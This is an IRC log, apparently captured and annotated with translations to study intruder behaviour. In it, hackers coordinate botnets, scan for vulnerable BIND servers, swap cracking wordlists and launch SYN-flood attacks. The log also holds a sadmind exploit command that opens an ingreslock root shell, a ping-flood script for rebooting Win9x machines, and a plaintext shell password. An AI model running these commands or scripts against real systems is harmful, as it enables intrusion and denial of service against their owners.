      :tsmurf :y0 y0
      :lagged :y0 y0
      :ultralame :y0 y0
      :ZoRRo^ :y0 y0
      :jang :y0 y0
      :obsleet :y0 y0
      :kaos6567 :y0 y0
      :smurf6 :y0 y0
      :bitch_ :y0 y0
      :romance :y0 y0
      :SEX :y0 y0
      :wtf :y0 y0
      :xinetd :y0 y0
      :argv[1] :y0 y0
      :cunt` :y0 y0
      :Nickless :y0 y0
      :kaos1024 :y0 y0
      :imapd :y0 y0
      :kaos__ :y0 y0
      :debain :y0 y0
      :peniswise :y0 y0
      :PHAT :y0 y0
      :jupe-bot :y0 y0
      :CyneX :y0 y0
      :VsnL2 :y0 y0
      :[A]]] :y0 y0
      :nEtbSd :y0 y0
      :D1ck :errrr
      :D1ck :uplam taplam karta tha
      
      you're dinking around
      
      :D1ck :kity pai kity pai ji eye jo
      
      [some babbling - ending with G I Joe]
      
      :D1ck :macdonalds may hai kuch baaat
      
      is there any talk of macdonalds?
      
      :J4n3 :lol
      :oracle :hehe
      :oracle :y0 y0
      :J4n3 :wait ek second keliye channel karachi bejtha hon inko, no one is there right now, zara bharam
      
      wait for one second, sending them to channel to karachi, no one is there right now, for a little
      
      :Vamp|re` tum channel pe raaj karo :p
      
      well go ahead and rule the channel :p
      
      :J4n3 :aur kithnay chaiyen ?
      
      how many more do you want?
      
      :Vamp|re` aab kush ho gaay
      
      are you happy now?
      
      :KILLER1?:abey yaar yeh emechs hain saarey!?
      
      hey dude are these emechs all there?
      
      :KILLER1:abey yaar yeh emechs hain saarey!
      :Vamp|re`:hamain apn apata nahi chaal raha in bot ke bech main
      
      we cannot figure out ourselves in these bots? (i dont know if i could get the accurate translation on this one)
      
      :KILLER1 :baney howey hain emech sey
      
      made from emech
      
      :D1ck :hehehe
      :D1ck :sure
      :D1ck :they are secure
      :D1ck :they are secured
      :D1ck :i patched all those fucking hosts :P
      :J4n3 :haha who tho hobee gaya
      
      haha that has already been done
      
      :D1ck :and i bet naveed couldnt own bind
      :J4n3 :kub ka join karkay part karwa diya 
      
      since long made him part after joining
      
      :D1ck :haha
      :D1ck :lol
      :D1ck :kewl
      :J4n3 :hhahha
      :D1ck :hehe
      :J4n3 :usko bind ka patha hee nahin
      
      he doesnt even know about bind
      
      :D1ck :oye give me some indian class b
      :D1ck :i`ll mass own
      :J4n3 :bind ?
      :D1ck :yep
      :J4n3 :Vamp|re` yaar isko baksh day pehlay hina kay site ja chuka hai
      
      vampire, wish him well before he goes to hina's site
      
      :D1ck :?
      :J4n3 :oops
      :D1ck :mujhay aik lafz nahin samhaj may aya
      
      i cant understand one thing
      
      :D1ck :y0
      :D1ck :u hyper ircer
      :D1ck ::P
      :J4n3_ ::)
      :J4n3_ :ip resolve nahin huwa
      
      ip couldnt resolve
      
      :D1ck :hehe
      :D1ck :irc0p.org
      :D1ck :?
      :J4n3_ :heh yeah
      :D1ck :J4n3 it's imp when u get back messsage me.
      :J4n3 :abay i am ehre
      :J4n3 :lol
      :D1ck :ACTION is away: (sleep) [BX-MsgLog On]
      :J4n3 :D1ck 
      :J4n3 :D1ck 
      :J4n3 :netsrvrcs.saha.ernet.in's named that errors on iquery is version: 8.1.1
      
      [note : ernet.in is an Indian Educational and Research network (ERnet)]
      
      :J4n3 :hp1.example.in's named that errors on iquery is version: 8.2.1
      :J4n3 :hp2.example.in's named that errors on iquery is version: 8.2.1
      :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :tnp.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2
      :J4n3 :192.168.151.3's named that errors on iquery is version: named 4.9.5-Rel+-
      :D1ck :b0h
      :D1ck ::)
      :D1ck :errrrr
      :D1ck :get me some domains
      :D1ck :like
      :J4n3 :hehe
      :D1ck :kewl
      :D1ck ::P
      :J4n3 :scanning horahi ahi na in.log
      
      scanning is being done in in.log
      
      [note: would be worthwhile snagging that in.log file for IPs and scan results]
      
      :D1ck :okie
      :D1ck :hehe
      :D1ck :oye 
      :J4n3 :yeah ?
      :D1ck :how big is yure cracking file?
      :D1ck :word lisT?
      :J4n3 :humm 100 mb i think
      :J4n3 :may be more not sure
      :D1ck :wow
      :D1ck :where did u get it?
      :D1ck :i want it tew
      :D1ck :i want it tew
      :J4n3 :packetstorm :p
      :D1ck :i want it tew
      :D1ck :oki
      :D1ck :;)
      :J4n3 :ARGONG's Dictionary
      :J4n3 :ARGON'S even
      :J4n3 :oye 100 mb nahin hia
      
      yo 100mb is not there
      
      :J4n3 :in zip fiel its 65 mb i think
      :J4n3 :or 25 not sure but when u unzip its 234 mb
      :D1ck :wow
      :D1ck :please give me the exact url
      :D1ck ::P
      :D1ck ::P
      :D1ck :i`ll download
      :J4n3 :dont remember yaar, i downloaded it long ago
      :D1ck :oh
      :D1ck :;(
      :J4n3 :but its in Archieve/wordlists
      :J4n3 :thats what i remember
      :D1ck :oh
      :J4n3 :D1ck 
      :J4n3 :try to use Crack5
      :D1ck :?
      :J4n3 :its kewl
      :J4n3 :and the best cracker
      :D1ck :what's that?
      :D1ck :send me
      :D1ck :send me
      :D1ck : /dcc
      :J4n3 :i dont have it
      :J4n3 :coz i couldn't configure it
      :J4n3 :but u can get it from packetstorm
      :D1ck :oh
      :J4n3 :same Archieve cracks
      :D1ck : okies
      :D1ck :i will
      :D1ck :i cant get in archieves
      :D1ck :whats the url for archives?
      :J4n3 :wait lemme check
      :D1ck :packetstorm.securify.com/archieve?
      :D1ck :?
      :J4n3 :D1ck 
      :D1ck :?
      :J4n3 :packetstorm.securify.com/assess.html
      :J4n3 :check password crackers link in this page
      :D1ck :oki
      :D1ck :and wordlist?
      :D1ck :i found it
      :D1ck ::)
      :D1ck :Read 65 KB of data, 6 KB/sec.
      :D1ck :wow
      :D1ck :6 KB
      :D1ck ::)
      :D1ck :man
      :D1ck :tehere are 300 .gz
      :D1ck :which one should i download?
      :D1ck :name
      :D1ck :?
      :D1ck :???????
      :D1ck :???????
      :D1ck :?????
      :D1ck :??????
      :J4n3 :hhaha u mean wordlist ?
      :J4n3 :look for Argon
      :D1ck :yep
      :D1ck :oiki
      :D1ck :there is no argon
      :D1ck :?
      :D1ck :????????
      :D1ck :??????????????
      :D1ck :?
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :???????????????????????????????????????????????????
      :D1ck :oye
      :D1ck :J4n3 
      :D1ck :u there?
      :D1ck :i got d/c
      :D1ck :world tel roc
      :D1ck :world tel rox
      :D1ck :OH MY GOD
      :D1ck :10 K
      :D1ck :OH GOD
      :D1ck :6 K
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :kaos1024
      :kaos__
      :kaos6567
      
      -=-=
      
      Day 07 June 10
      
      :m4ry :YO
      :m4ry :HEY
      :m4ry :WAKE UP MORONS
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :_pen :whats goin on?
      :D1ck :nadda
      :D1ck :bored
      :_pen :em too
      :_pen :i got my first legit shell
      :D1ck :haha
      :D1ck :cool
      :D1ck :how much did u pay?
      :_pen :nothing
      :D1ck :.add D1ck * D1ck 100 1 4
      :_pen :heh
      :D1ck :.save
      :D1ck :where had u bee/.
      :D1ck :u hang in #amdx?
      :_pen :no
      :_pen :they are being gay
      :D1ck :cool
      :D1ck :hehe
      :_pen :grid is mad cuz im friends with someone he hates
      :_pen :therefor im not aloud in there
      :D1ck :hahaha
      :D1ck :grid's gay'
      :D1ck :U HANG WITH DIZASYA
      :D1ck :DIZSTA
      :D1ck :HEH
      :D1ck :i`ve hacked 30+ of his shells
      :D1ck :he doesnt even know hwo to secure it
      :D1ck :or secure a subnet
      :D1ck :tons locally
      :D1ck :_pen 
      :D1ck :dont hand over the key to any one 
      :D1ck :ok?
      :_pen :ok
      :D1ck :_pen: who gave u the key, btw?
      :D1ck :m4ry??
      :_pen :*** D1ck has joined #lecole
      :_pen :<D1ck> j #k1dd13 neat22
      :D1ck :oh
      :_pen :)
      :D1ck :h3h
      :_pen :=)
      :D1ck ::)
      :D1ck :ok
      :D1ck :what in the world are u doing in #deathaces?
      :D1ck :heh
      :_pen :what is it?
      :D1ck :a channel for fun
      :_pen :i just did a whois
      :_pen :and saw someone in there
      :_pen :and joined
      :D1ck :heh kl
      :_pen :a channel for fun == ?
      :D1ck :welp
      :D1ck :hey hang in for chatting etc
      :D1ck ::)
      :_pen :k
      :D1ck ::)
      :_pen :hey
      :_pen :do u have the syntax
      :_pen :for
      :D1ck :yeah
      :_pen :sadmind exploit
      :_pen :?
      :D1ck :lol
      :D1ck :yes
      :_pen :what is it
      :D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p]
      :_pen : what do i do for -c
      :D1ck :heh
      :D1ck :u dont know?
      :_pen :no
      :D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
      :D1ck :that would open 1524
      :_pen :%sp 0x00000000 offset 688 --> return address 0x000002b0
      :_pen :[4]
      :_pen :%sp 0x00000000 with frame length 4808 --> %fp 0x000012c8
      :_pen :exploit failed; RPC succeeded and returned { 2, 343, "[1,1,1]   
      :_pen : 
      :_pen :" } 
      :D1ck :c==command
      :_pen :wtf
      :_pen :it seg faulted
      :_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
      :_pen :thats what i did
      :_pen :heelo?
      :D1ck :[Lag ??] 
      :D1ck :what did u ask
      :D1ck :repeat again
      :D1ck :i got d/c
      :_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
      :_pen :thats what i did
      :_pen :and it seg faulted
      :D1ck :dunno
      :D1ck :brb
      :Insekt :thanks
      :D1ck :yep
      :D1ck :np
      :D1ck :mechnet
      :Insekt :nice
      :Insekt :it was in #flem for a little while right?
      :Insekt :or some of them
      :Insekt :even
      :D1ck :?
      :insekt` :?
      :insekt` :what?
      :D1ck :hehe
      :insekt` :flem lost ops again
      :insekt` :heh
      :D1ck :shit
      :D1ck :heh
      :D1ck :i`ll fuck all of them
      :insekt` :it happens like every week
      :D1ck :to regain
      :D1ck :i offfered them bots
      :D1ck :but no no
      :D1ck :dont listen to me
      :insekt` :heh
      :D1ck :heh
      :insekt` :its always a good chan though
      :D1ck :yep
      :insekt` :with or without ops
      :D1ck :;P
      :insekt` :heh
      :D1ck :;p
      :insekt` :so, whats been going on?
      :insekt` :hah
      :insekt` :am join chan #enforcers
      :D1ck :heh
      :insekt` :elite
      :insekt` :dammit
      :insekt` :heh
      :D1ck :ACTION is away: (SLEEP) [BX-MsgLog On]
      :D1ck :cya
      :D1ck :gave to sleep
      :insekt` :see ya
      
      -=-
      
      Day 08 June 11
      
      :m4ry :.deop jupe
      :m4ry :.up
      :m4ry :wise op m4ry
      :m4ry :wise deop jupe
      :m4ry :.say hi
      :kaos__ :hi
      :kaos____ :hi
      :kaos_____ :hi
      :_aos_____ :hi
      :kaos___ :hi
      :jupe :hi
      :m4ry :jupe part
      :D1ck :kaos__ nick nutsack
      :D1ck :kaos___ nick dumbly
      :D1ck :%kaos____ nick rewted
      :D1ck :kaos_____ nick bate
      :D1ck :_aos_____ nick anarchy
      :D1ck :kaos____ nick cutlose
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :_aos_____ nick duke
      :D1ck :J4n3 
      :D1ck ::)
      :J4n3 :D1ck nick SeXyGuy19
      :D1ck :there?
      :D1ck :hahaa
      :J4n3 :yeah :)
      :D1ck : /nick SeXyGuy19
      :J4n3 :heh
      :D1ck ::)
      :D1ck :hh
      :D1ck :;)
      :D1ck :cool bots?
      :D1ck :.add J4n3 * J4n3 100 1 4
      :D1ck :.save
      :D1ck :oye
      :D1ck :we have to change the key
      :D1ck :.join #
      :J4n3 :humm
      :D1ck :heh
      :D1ck :lagged
      :D1ck :worldtel sucks.
      :J4n3 :heh why change the key ?
      :D1ck :oye
      :D1ck :J4n3 
      :D1ck :load shells
      :D1ck :we have to dos
      :D1ck :i am ready with 4
      :D1ck :u load 4-5
      :D1ck :dos RR
      :D1ck :and
      :D1ck :Deadrat
      :J4n3 :hermm
      :D1ck :ok?????????
      :J4n3 :wait
      :D1ck :please
      :D1ck :192.168.6.223
      :D1ck :and
      :D1ck :./syn 0 192.168.6.223 1 1024
      :D1ck :ok just dos this 38 wala with 2 boxes
      :D1ck :and the other with rest
      :D1ck :coz i`m dosing it
      :D1ck :./s2 0 192.168.6.223 1 1024
      :J4n3 :humm ok
      :D1ck :okies
      :D1ck :thanks
      :D1ck :me dosing too
      :D1ck :./syn 0 192.168.6.223 1 1024
      :D1ck :oye sun u dosing?
      :D1ck :started?
      :J4n3 :yup
      :J4n3 :lagging badlay yaara
      :D1ck :oye
      :D1ck :he changed hosts
      :D1ck : Signon by DeadRat
      :D1ck :oye stop dos on him
      :D1ck :and dos
      :D1ck :node177190.example.edu
      :J4n3 :hmm
      :J4n3 :waito
      :J4n3 :./syn 0  node177190.example.edu 1 1024
      :D1ck :./syn 0 192.168.177.190 1 1024
      :D1ck :nope ip
      :J4n3 :yeah yeah 
      :D1ck :thanks
      :D1ck ::)
      :J4n3 ::O)
      :D1ck :thanks J4n3 
      :D1ck :me also dosing
      :D1ck :boh dossed
      :D1ck :both
      :D1ck ::)
      :J4n3 :hehe
      :D1ck :heh
      :D1ckhack :.part
      :D1ck :.join #
      :D1ck :.join #
      :J4n3 :oye what happened ?
      :J4n3 :oey
      :D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :oye shn1p3r
      :J4n3 :D1ck reply man
      :J4n3 :i'll tell u a kewl way :p
      :J4n3 :new trick :p
      :J4n3 :reboot windows heeh with no programz
      :J4n3 :D1ck
      :D1ckhack :.op
      :D1ckhack :.up
      :D1ck :J4n3 
      :D1ck ::)
      :D1ck :sup baby
      :J4n3 :u on winbl0ws ?
      :D1ck :nope
      :D1ck ::)
      :D1ck :128 bots
      :J4n3 :oh
      :J4n3 :i c 
      :J4n3 :lol yeah
      :J4n3 :oye i can reboot any win98 machine :p
      :D1ck :kewl
      :D1ck :0-day?
      :J4n3 :hahaha no sploit
      :D1ck :do u use ath0.c by th0m45?
      :J4n3 :just a simple ping command :p
      :D1ck :can d/c any one
      :D1ck :hahahahaha
      :D1ck :2b2b2b2000db
      :D1ck :?
      :J4n3 :no but it works only with zoltrix modem 
      :J4n3 :and it disconnects urself too :(
      :J4n3 :noooooo
      :J4n3 ::p
      :D1ck :2b2b2b415448300d
      :J4n3 :noooooooooooo
      :D1ck :oh
      :J4n3 ::p
      :D1ck :send me the coce
      :D1ck :i will make a shell script
      :J4n3 :haha abay simple online command of ping
      :J4n3 :and it will reboot any win98 machine or hang it
      :D1ck :kewl
      :D1ck :give me the ping command
      :J4n3 :but
      :J4n3 :works with linux only
      :J4n3 :and if u do it with ur own box, it will kill u with lag
      :J4n3 :do it from a linux rewt
      :J4n3 :in 1 minute it will dc and hang the system
      :J4n3 :command is
      :J4n3 :ping -f -s 65000 <IP> :pPPpPp
      :D1ck :kewl
      :D1ck :wait
      :J4n3 :ok but dont try it on me :/
      :J4n3 ::/
      :D1ck :#
      :D1ck :if [ $# 
      :D1ck :echo " "
      :D1ck :echo "[*] Usage $0 IP"
      :D1ck :echo "[*] ping reboot any win 9.x machine by D1ck, Idea by J4n3."
      :D1ck :echo " "
      :D1ck :exit
      :D1ck :else
      :D1ck :ping -f -s 65000 $1
      :D1ck :fi
      :D1ck :kewl
      :D1ck :?
      :J4n3 :lol set
      :J4n3 :tyte
      :D1ck :give me some ips
      :D1ck :hehehe
      :D1ck :dont worry
      :J4n3 :try it on 192.168.68.163
      :D1ck :oye
      :D1ck :i made a script
      :D1ck :u can reboot ever user of a class c
      :D1ck :with this
      :D1ck :./reboot.sh 192.168.252
      :J4n3 :oh no
      :D1ck :will reboot ever uses using this
      :D1ck :kewl?
      :J4n3 :shit no
      :J4n3 :wahi ping command ?
      
      the same ping command?
      
      :D1ck :heheh
      :D1ck :wait 
      :D1ck :i`m making it
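      :J4n3 :kewl kewl bana,  phir syn and smurf kaa kaam khatam :P
      :J4n3 :but bnc walon ka nahin hoga :(
      :J4n3 :unkay liye syn hee sahi hai
      
      cool, cool, make it, then syn and smurf will have no work left :P
      but it will not work on the bnc people :(
      for them syn is still the right thing
      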
      :D1ck :yep
      :D1ck :?
      :D1ck :oye how many ppl know about it?
      :J4n3 :no one
      :J4n3 :except moi :p
      :J4n3 :dont spread it :p
      :J4n3 :i've seen it written somewhere in a txt of some sploit
      :J4n3 :but its not common, and no one know about it yet
      :D1ck :kewl
      :D1ck :oye done 
      :D1ck :i`ll send u ina  phew
      :J4n3 :kewl kewl :P
      :J4n3 :okies :)
      :J4n3 :try it on some isp
      :D1ck :yep
      :D1ck :oye J4n3 
      :D1ck :give me some isp
      :D1ck :which should i n3wk
      :D1ck :?
      :J4n3 :hmmm
      :J4n3 :try satnet naa
      :D1ck :?hahha
      :D1ck :ok
      :D1ck :192.168.2?
      :D1ck :192.168.25/?
      :D1ck :?
      :J4n3 :hmm
      :J4n3 :192.168.25.*
      :D1ck :./rebootclass.sh 192.168.25.1
      :J4n3 :kewl lets see
      :D1ck :...............................................................................................................................................................................................................................................................................................................................................................
      :D1ck :one sec
      :D1ck :let me see
      :D1ck :i think i`ll have to write a looop
      :D1ck :but lets see
      :J4n3 :hmm ok
      :D1ck :ooops
      :D1ck :i frgot to chmod +x a file hehe
      :D1ck :fixed
      :J4n3 ::??
      :J4n3 :lol
      :J4n3 :ok
      :D1ck :done
      :D1ck :lets see if they ping out
      :D1ck :join #delusion
      :D1ck :and see
      :D1ck :?P
      :J4n3 :ok wait
      :D1ck :oye
      :D1ck :are u sure this command works?
      :D1ck :give me some ip
      :D1ck :i`ll d.c them
      :J4n3 :100 %
      :J4n3 ::p
      :J4n3 :when i try it on a single ip, it goes down 101 %
      :J4n3 :haven't found one who didn't go offline
      :D1ck :oye
      :D1ck :u there?
      :D1ck :J4n3 
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :fucking worldtel
      :D1ck :sux muh azz
      :D1ck ::)
      :D1ck :'az''
      :D1ck :accept the script
      :D1ck :hmmm
      :D1ck :?
      :D1ck :J4n3 
      :D1ck :world tel
      :D1ck :sux
      :D1ck :J4n3 
      :D1ck :NEW KEY J4n3 
      :D1ck :get it
      :D1ck ::)
      :D1ckhack :ACTION is away: (MOVIE #@$@
      :D1ck :ACTION is away: (MOVIE #@$@
      :D1ck :pnp sux
      :D1ck :pnp sux
      :J4n3 :lol still ?
      :D1ck :when i double click i want the chaninfo with topic bans etc
      :D1ck :it gives me a input box, to write topic
      :D1ck :blah
      :D1ck :heh
      :J4n3 :HAHAHAHAH
      :J4n3 :lol
      :D1ck ::P
      :J4n3
      :J4n3
      :J4n3
      :J4n3
      :D1ck :(@az): and what's with the topic
      :D1ck :*** BigPoppa changes topic to 'booop'
      :D1ck :(@az): owning g|nger` ?
      :D1ck :*** DeadRat sets mode: +o h4r33
      :D1ck :l3w|
      :J4n3 :hehe
      :D1ck :(symetrix`): im a korjap
      :D1ck :(@h4r33): <maxxed> 24.143.24.1
      :D1ck :(@h4r33): <maxxed> its my uplink and its unkillable
      :D1ck :(@h4r33): <maxxed> sure you can kill me but you can't take the uplink down
      :D1ck :(@h4r33): HAHAAAAAAAAAAAA
      :D1ck :(@madcow-): why would you want to kill your uplink?
      :D1ck :* symetrix` munches on some rice
      :D1ck :(@h4r33): mother fuckin uplink is DEAD
      :D1ck :he thinks dosing is 'COO'L' *shrug*
      :J4n3 :lol
      :D1ck :(@BigPoppa): diz
      :D1ck :(@BigPoppa): has there ever been something you couldnt kill?
      :D1ck :(@madcow-): me
      :D1ck :(@madcow-): :)
      :D1ck :(@h4r33): not yet
      :D1ck :oye
      :D1ck :come to windows
      :D1ck :and i`m loading up 30+ of my shells
      :D1ck :to dos
      :D1ck :u load too
      :J4n3 :i am in windows
      :J4n3 :and ready to dos
      :D1ck :if u want
      :J4n3 :just give me the IP
      :D1ck :if u dont we will do it another day
      :D1ck ::)
      :J4n3 :i have 11 boxes ready
      :D1ck :kewl
      :D1ck :let me load up
      :J4n3 :kkz
      :D1ck :how many boxes?
      :J4n3 :11
      :D1ck :oki
      :D1ck :[*] Loading Boxens....
      :J4n3 :heh
      :J4n3 :ip ?
      :J4n3 :my 11 boxes r enuff to take down anyone :p
      :D1ck :lol
      :D1ck ::)
      :J4n3 ::)
      :J4n3 :ogin: root
      :J4n3 :Password:
      :J4n3 :Sun Microsystems Inc.   SunOS 5.7       Generic October 1998
      :J4n3 :These are the times that try anybody's soul.
      :J4n3 :A bird in the hand can bite. 
      :J4n3 :You have mail.
      :J4n3 :# cd /dev/".. "/sun2/packet
      :J4n3 :# 
      :D1ck :system.example.com
      :D1ck :oye
      :D1ck :do this
      :D1ck :dig @system.example.com version.bind chaos txt
      :D1ck :and paste me what u get
      :J4n3 :i'm on windows
      :J4n3 :where ??
      :J4n3 :from any box ?
      :D1ck :oh
      :D1ck :try if dig works
      :J4n3 :wait
      :J4n3 :VERSION.BIND.           0S CHAOS TXT    "8.2.1"
      :J4n3 :; <<>> DiG 8.2 <<>> @system.example.com version.bind chaos txt
      :J4n3 :;
      :J4n3 :;; FROM: gujarat to SERVER: system.example.com 192.168.244.99
      :J4n3 :;; Total query time: 467 msec
      :J4n3 :;; ANSWER SECTION:
      :J4n3 :;; version.bind, type = TXT, class = CHAOS
      :J4n3 :;; QUERY SECTION:
      :J4n3 :;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
      :D1ck :LOL
      :J4n3 :;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10
      :D1ck :LOL
      :D1ck :LOL
      :D1ck :LOL
      :D1ck :LOL
      :D1ck :LOL
      :J4n3 :;; got answer:
      :D1ck :I WILL OWN IT
      :J4n3 :;; res options: init recurs defnam dnsrch
      :J4n3 :; (1 server found)
      :J4n3 :; (1 server found)
      :J4n3 :hehe
      :J4n3 :who's this ?
      :D1ck :BWHAHAHAHAHA
      :D1ck :h4r33^
      :D1ck :i`ll own it
      :D1ck :lamer cant even path his box
      :J4n3 :kewl
      :J4n3 :tight
      :J4n3 :kar kar own kar
      
      do it, do it, own it
      
      :D1ck :heh
      :D1ck :he's such a lamer
      :D1ck :let me reboot
      :D1ck :brb
      :D1ck :brb
      :J4n3 :heh okies
      :D1ck :oye
      :D1ck :u there?
      :J4n3 :yeah
      :D1ck :my NS is getting 43503495-43-593 quries
      :D1ck ::?(
      :D1ck ::(
      :J4n3 :huh
      :J4n3 ::/
      :D1ck :lol
      :J4n3 :what's the chances ?
      :D1ck :100% if my NS is working like yesterday
      :D1ck :shit i think named is dead
      :J4n3 :oh :(
      :D1ck :;; res_nsend to server system.example.com  192.168.244.99: Connection timed out
      :D1ck :som one is dosing em
      :D1ck :or
      :D1ck :some thing is wrong
      :J4n3 :hmmm
      :J4n3 :try later
      :D1ck :k
      :D1ck :system.example.com
      :D1ck :remember
      :D1ck :i will own it tonight
      :J4n3 :yeah
      :J4n3 :sure
      :D1ck ::P
      :D1ck :hurry its important
      :D1ck :
      :D1ckhack :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :D1ck 
      :J4n3 :what happened ?? sorry main neechay gaya tha
      :J4n3 :kuch khaanay
      
      what happened ?? sorry, i had gone downstairs
      to eat something
      
      :D1ck :np
      :D1ck :never mind
      :D1ck :yaar
      :D1ck :i was wondering
      :D1ck :when we change login
      :D1ck :admin cant login
      :D1ck :so thats fucked?
      :D1ck :linux
      :D1ck :?
      :J4n3 :hmmm
      :J4n3 :yahi main humesha sochta hon
      :J4n3 :lekin i think aisa nahin hai 
      :J4n3 :unka login chaltha hai
      
      this is what i always wonder
      but i think it is not like that
      their login works
      
      :D1ck :nope
      :D1ck :it doesnt workl
      :D1ck :i tried
      :J4n3 :what ?? i mean u dont know what admin pass is
      :D1ck :login: dynamic
      :D1ck :Password:
      :D1ck :Login incorrect
      :D1ck :login: dynamic
      :D1ck :Password:
      :D1ck :that sux
      :D1ck :i`m doing it with my box
      :D1ck :send me the root/owned
      :D1ck :let me try that
      :J4n3 :hmm its on linux :/
      :J4n3 :wait wait
      :D1ck :shit
      :J4n3 :try my zippy.example.org
      :D1ck ::(
      :D1ck :oki
      :D1ck :k
      :D1ck :user/pass?
      :J4n3 :user : micr0n
      :J4n3 :pass : ashunkla
      :D1ck :k
      :D1ck :name?
      :D1ck :of the file
      :D1ck :never mind
      :D1ck :brb i have to change their normal login
      :D1ck :brb
      :J4n3 :oye
      :J4n3 :linux.tar hai
      
      it is linux.tar
      
      :J4n3 :D1ck 
      :D1ck :J4n3 
      :D1ck :?
      :J4n3 :oye can j0e know the key of K1dd13 ???
      :D1ck :yep
      :D1ck :he can
      :J4n3 :ok thanx :)
      :J4n3 :i trust him 100 % :)
      :D1ck :kewl
      :D1ck :oye 
      :D1ck :dos h4r33
      :D1ck :so i can jupoe him and annoy ircops
      :D1ck :like i always do :
      :D1ck ::P
      :D1ck :and get him glined
      :D1ck :and #delusion is edge of being purge
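      :J4n3 :oh yaar i have to lead shell's again, sub band kardeen , sonay ja raha tha, if u say i
      :J4n3 :load again
      :J4n3 :waisay channel #delusion tho pehlay bee purge hogaya tha, benchodon nay dubara layliya
      
      oh pal, i have to load shells again, i shut them all down, i was going to sleep; if you say so i will load again
      by the way, channel #delusion had already been purged once before, the bastards took it back again
      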
      :D1ck :no
      :D1ck :its ok
      :D1ck ::)
      :D1ck :coz rr did
      :D1ck :rr is my freind
      :D1ck :rr is freinds with danny (the personm who purged it)
      :J4n3 :oh oh
      :J4n3 :kewl
      :D1ck :and diz sucked rr ballz to give him w and he will own his soul to him
      :J4n3 :i wish get it purged
      :D1ck :so rr decided he would help em if he doesnt say lame shit
      :D1ck :so thats what happened
      :J4n3 :ahaaaaan
      :J4n3 :now rr want to purge it again ?
      :D1ck :yep
      :D1ck :he wants to
      :D1ck :but his relations with opes isnt as good as before
      :D1ck :he is trying
      :D1ck :can u dos him with 2 shells plls
      :D1ck ::/
      :D1ck :only 2
      :D1ck :not more
      :J4n3 :hmm kewl :)
      :D1ck ::P
      :D1ck ::P
      :J4n3 :ok wait
      :D1ck :thanks
      :D1ck :thanks
      :J4n3 :naa now i'll load 8 to 10 wait
      :D1ck :hehe
      :D1ck :no no
      :D1ck :jani
      :D1ck :u need 2 shells for diz .xx
      :D1ck ::LP
      :J4n3 :hehe wait naa already loaded 5 
      :D1ck :hehe
      :D1ck :thx
      :D1ck ::)
      :J4n3 :ok what's the iP ?
      :D1ck :hehe
      :D1ck :192.168.1.99
      :J4n3 :hmmm hold on
      :D1ck :ok
      :J4n3 :what's his nick ?
      :D1ck :h4r33
      :D1ck :unet is lagged
      :D1ck :MEWHEHEHE
      :D1ck : Signoff by h4r33
      :D1ck :kewl
      :D1ck ::))))
      :J4n3 :he will go down soooooon
      :D1ck :<T|mm|n8r:#delusion> *** h4r33 has quit IRC (Ping timeout for
      :D1ck :                     h4r33[ns3.example.net.xx])         whats he doing in
      :D1ck :                     the place
      :D1ck :pheared
      :D1ck :
      :J4n3 :fuck i emailed them, but donno the address :/  sent to root  postmaster, support sales help 
      :J4n3 :but donno they got it or not, 
      :D1ck :no man
      :D1ck :i have their main 15 MB PIPE hub
      :D1ck :the whole example depend on
      :J4n3 :kewl
      :D1ck ::P
      :D1ck :yep
      :D1ck :stop it
      :h4r33 ::P
      :J4n3 :wtf ?
      :D1ck :?
      :D1ck :that was me
      :J4n3 :errrrrrrrrr
      :J4n3 :lol
      :D1ck :lol
      :J4n3 :He He He He
      :D1ck ::P
      :J4n3 :oye what's the bnc pass for ns2.example.net ?
      :j0e :uffo ehhe
      :j0e :itnay saray bots
      
      so many bots
      
      :J4n3 :hehe
      :D1ck :hey j0e 
      :D1ck :hehe
      :D1ck :hey J4n3 
      :j0e :lol
      :Sp07 :lots of bots
      :D1ck :`im missing 50
      :Sp07 :hehe
      :Sp07 :set up crontab
      :Sp07 :on each one
      :D1ck :.join #7thsphere
      :D1ck :.part #7thsphere 
      :Sp07 :.part #7thsphere 
      :Sp07_ :7th(2k) using ..15cryptonik 14ice 14(15alpha14)
      :Sp07 :d1ck
      :Sp07 :make me a bnc on a fast server =D
      :D1ck :kaos___ nick nameserver
      :D1ck :heh
      :Sp07 :oc3
      :Sp07 :hehe
      :Sp07 :why dont you make some vhosts?
      :Sp07 :with your nameservers
      :Sp07 :hehe
      :Sp07 :K1dd13.timenet.net
      :D1ck :hehe
      :D1ck :Sp07.rooted.his.first.box.from.timenet.net
      :D1ck :hehe
      :Sp07 :hehe
      :D1ck :i`ll point
      :D1ck :later
      :D1ck :its 9 am
      :D1ck :and i dint sleep
      :Sp07 :hehe
      :Sp07 :sleep is for wussies
      :D1ck :kaos__ nick freebsd
      :D1ck :kaos___ nick jin
      :Sp07 :its 9 pm and I still didnt study for this test
      :D1ck :hahahha
